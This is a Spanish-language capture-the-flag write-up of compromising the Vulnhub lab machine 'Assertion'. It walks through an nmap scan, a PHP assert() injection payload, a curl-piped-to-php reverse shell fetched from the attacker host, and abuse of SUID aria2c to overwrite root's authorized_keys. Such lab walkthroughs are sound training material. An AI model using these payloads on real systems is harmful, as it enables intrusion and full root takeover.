[VLN] Assertion

Hoy vamos a hackear la maquina de Vulnhub llamada Assertion. Podeis descargarla desde el siguiente enlace: Assertion

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p- 192.168.112.139
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 23:14 CEST
Nmap scan report for 192.168.112.139
Host is up (0.0030s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 6e:ce:aa:cc:02:de:a5:a3:58:5d:da:2b:ef:54:07:f9 (RSA)
|   256 9d:3f:df:16:7a:e1:59:58:84:4a:e3:29:8f:44:87:8d (ECDSA)
|_  256 87:b5:6f:f8:21:81:d3:3b:43:d0:40:81:c0:e3:69:89 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Assertion
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.05 seconds
Tras explorar la pagina web, vemos que "index.php?page=" tiene un LFI un tanto especial debido a la funcion assert.

http://192.168.112.139/index.php?page=' and die(system('id')) or '
Sabiendo que podemos ejecutar comandos en la victima, vamos a preparar una php-reverse-shell.

sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
sml@m0nique:~$ mv php-reverse-shell.php rshell.php
sml@m0nique:~$ nano rshell.php #MODIFICAMOS_IP/PUERTO
Ponemos nc a la escucha:

sml@m0nique:~$ nc -nlvp 1234
listening on [any] 1234 ...
Y por ultimo navegamos a...

http://192.168.112.139/index.php?page=' and die(system("curl 
http://192.168.112.128/rshell.php|php")) or '

Low Shell


Y ya estamos dentro :)

sml@m0nique:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.139] 35662
Linux assertion 4.15.0-74-generic #84-Ubuntu SMP Thu Dec 19 08:06:28 UTC 2019 
x86_64 x86_64 x86_64 GNU/Linux
 20:11:10 up  2:03,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
Buscamos a ver si encontramos algo con permisos SUID.

$ find / -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/at
/usr/bin/aria2c
/usr/bin/newgrp
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
---SNIP---
$ 

Privilege Escalation


Encontramos el programa aria2c, el cual podemos utilizar para descargarnos un fichero y sobrescribir el original como root. Prepararemos un authorized_keys con nuestra llave publica, y luego dicho fichero lo guardaremos en /root/.ssh/authorized_keys, usando aria2c sobrescribiremos el original y podremos loguearnos como root por ssh sin password! Preparamos el authorized_keys.

sml@m0nique:~$ cat ~/.ssh/id_rsa.pub >> /var/www/html/authorized_keys           
                                                                                
                                                    
Usando aria2c, lo copiamos donde queremos :)

www-data@assertion:/$ /usr/bin/aria2c -d /root/.ssh/ -o authorized_keys 
"http://192.168.112.128/authorized_keys" --allow-overwrite=true                                                                                                                                                          
07/06 20:57:32 [NOTICE] Downloading 1 item(s)                                                                                                                   
07/06 20:57:32 [NOTICE] Download complete: /root/.ssh//authorized_keys 
          
Download Results:                                                               
gid   |stat|avg speed  |path/URI                                                   
======+====+===========+=======================================================  
d0ed13|OK  |   551KiB/s|/root/.ssh//authorized_keys                             
Status Legend:
(OK):download completed.
Y probamos!

sml@m0nique:/var/www/html$ ssh root@192.168.112.139
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Jul  6 20:57:40 UTC 2020

  System load:  0.01               Processes:            197
  Usage of /:   34.1% of 19.56GB   Users logged in:      0
  Memory usage: 14%                IP address for ens33: 192.168.112.139
  Swap usage:   0%

  => There is 1 zombie process.

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

76 packages can be updated.
0 updates are security updates.

Last login: Thu Jan 16 10:38:39 2020
root@assertion:~#

root.txt



root@assertion:~# ls
root.txt
root@assertion:~# cat root.txt
8efabdae07730bdcb14d83e37a2e7398

End


Y con esto ya seriamos root de la maquina :)